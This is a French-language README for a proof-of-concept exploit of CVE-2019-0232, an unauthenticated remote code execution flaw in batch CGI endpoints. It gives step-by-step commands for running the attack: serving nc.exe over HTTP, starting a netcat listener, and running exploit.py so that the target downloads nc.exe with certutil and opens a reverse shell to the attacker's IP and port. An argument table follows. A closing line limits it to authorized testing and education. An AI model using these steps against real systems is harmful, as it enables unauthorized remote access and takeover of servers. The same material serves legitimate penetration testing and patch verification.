
Exploit based in /jaiguptanick/CVE-2019-0232
PoC pour RCE non authentifié via des points de terminaison batch CGI. Télécharge nc.exe sur la cible en utilisant certutil et déclenche un reverse shell.
1. Servir nc.exe (dans le même répertoire où se trouve nc.exe) :
python3 -m http.server 80
2. Lancez votre écouteur :
nc -lvnp 1234
3. Exécutez l'exploit :
python3 exploit.py \
--url http://:/cgi/.bat \
--server-ip \
--server-port 80 \
--nc-ip \
--nc-port 1234
Uniquement pour des tests de pénétration autorisés et à des fins éducatives.
| Argument | Requis | Défaut | Description |
|---|
--url | ✅ | — | URL cible complète avec point de terminaison CGI |
--server-ip | ✅ | — | Votre IP servant nc.exe via HTTP |
--server-port | ❌ | 80 | Port pour le serveur HTTP |
--nc-ip | ✅ | — | Votre IP d'écouteur Netcat |
--nc-port | ✅ | — | Votre port d'écouteur Netcat |